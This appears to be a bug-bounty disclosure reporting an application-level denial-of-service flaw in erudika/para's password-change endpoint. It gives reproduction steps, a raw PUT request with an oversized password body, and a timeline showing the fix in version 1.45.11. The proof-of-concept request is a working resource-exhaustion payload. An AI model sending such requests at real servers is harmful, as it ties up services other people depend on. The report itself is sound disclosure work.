Application Level DoS: in erudika/para

Valid

Reported on

May 16th 2022

Description

Hey, when I attempt to change the password, I noticed that you haven't kept any password boundary. You need to limit password length. Hashing a large amount of data can cause significant resource consumption on behalf of the server and would be an easy target for an Application-level Denial Of Service attack.

Reproduction steps:

  1. Navigate to: "https://paraio.com/password"
  2. Request password change & provide the email
  3. Change password (Set New password = Boundless Characters/Special characters/Numbers)
  4. Done

Proof of Concept

PUT /paraio/password/eW9tb2dpcjk0NkBkdWV0dWJlLmNvbTpQeHp4d0NSa2hSVFpjbEktSVFNVENpR2JWUzhmWGRVdmliV3VXbUc2ako1WlBSRU1pRUtTNnhlMQ HTTP/1.1
Host: paraio.com
Cookie: para-csrf-token-anonid=DdR3L0JphcmFOK1BQMSZTA==; para-csrf-token=eh8oiG6FI5fFHibdEvOe2baOmwNRbKd/Tv+8P5dXkSo=
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://paraio.com/
Content-Type: application/json;charset=utf-8
X-Csrf-Token: eh8oiG6FI5fFHibdEvOe2baOmwNRbKd/Tv+8P5dXkSo=
Content-Length: 4258
Origin: https://paraio.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Sec-Gpc: 1
Te: trailers
Connection: close

{"password":"AAAAAAAAAAChange password  Set New password = Boundless Characters/Special characters/NumbersChange password  Set New password = Boundless Characters/Special characters/NumbersChange password  Set New password = Boundless Characters/Special characters/NumbersChange password  Set New password = Boundless Characters/Special characters/NumbersChange password  Set New password = Boundless Characters/Special characters/NumbersChange password  Set New password = Boundless Characters/Special characters/NumbersChange password  Set New password = Boundless Characters/Special characters/NumbersChange password  Set New password = Boundless Characters/Special characters/NumbersChange password  Set New password = Boundless Characters/Special characters/NumbersChange password  Set New password = Boundless Characters/Special characters/NumbersChange password  Set New password = Boundless Characters/Special characters/NumbersChange password  Set New password = Boundless Characters/Special characters/NumbersChange password  Set New password = Boundless Characters/Special characters/NumbersChange password  Set New password = Boundless Characters/Special characters/NumbersChange password  Set New password = Boundless Characters/Special characters/NumbersChange password  Set New password = Boundless Characters/Special characters/NumbersChange password  Set New password = Boundless Characters/Special characters/NumbersChange password  Set New password = Boundless Characters/Special characters/NumbersChange password  Set New password = Boundless Characters/Special characters/NumbersChange password  Set New password = Boundless Characters/Special characters/NumbersChange password  Set New password = Boundless Characters/Special characters/NumbersChange password  Set New password = Boundless Characters/Special characters/NumbersChange password  Set New password = Boundless Characters/Special characters/NumbersChange password  Set New password = Boundless Characters/Special characters/NumbersChange password  Set New password = Boundless Characters/Special characters/NumbersChange password  Set New password = Boundless Characters/Special characters/NumbersChange password  Set New password = Boundless Characters/Special characters/NumbersChange password  Set New password = Boundless Characters/Special characters/NumbersChange password  Set New password = Boundless Characters/Special characters/NumbersChange password  Set New password = Boundless Characters/Special characters/NumbersChange password  Set New password = Boundless Characters/Special characters/NumbersChange password  Set New password = Boundless Characters/Special characters/NumbersChange password  Set New password = Boundless Characters/Special characters/NumbersChange password  Set New password = Boundless Characters/Special characters/NumbersChange password  Set New password = Boundless Characters/Special characters/NumbersChange password  Set New password = Boundless Characters/Special characters/NumbersChange password  Set New password = Boundless Characters/Special characters/NumbersChange password  Set New password = Boundless Characters/Special characters/NumbersChange password  Set New password = Boundless Characters/Special characters/NumbersChange password  Set New password = Boundless Characters/Special characters/NumbersChange password  Set New password = Boundless Characters/Special characters/NumbersChange password  Set New password = Boundless Characters/Special characters/NumbersChange password  Set New password = Boundless Characters/Special characters/NumbersChange password  Set New password = Boundless Characters/Special characters/NumbersChange password  Set New password = Boundless Characters/Special characters/NumbersChange password  Set New password = Boundless Characters/Special characters/NumbersChange password  Set New password = Boundless Characters/Special characters/NumbersChange password  Set New password = Boundless Characters/Special characters/NumbersChange password  Set New password = Boundless Characters/Special characters/NumbersChange password  Set New password = Boundless Characters/Special characters/NumbersChange password  Set New password = Boundless Characters/Special characters/Numbers"}

Impact

Application-Level DoS

This allows for denial-of-service attacks through reworked submission of comprehensive passwords, tying up server resources in the expensive computation of the corresponding hashes.

We are processing your report and will contact the erudika/para team within 24 hours. a year ago
We have contacted a member of the erudika/para team and are waiting to hear back a year ago
Alex Bogdanovski validated this vulnerability a year ago
7h3h4ckv157 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Alex Bogdanovski marked this as fixed in 1.45.11 with commit 735f69 a year ago
Alex Bogdanovski has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation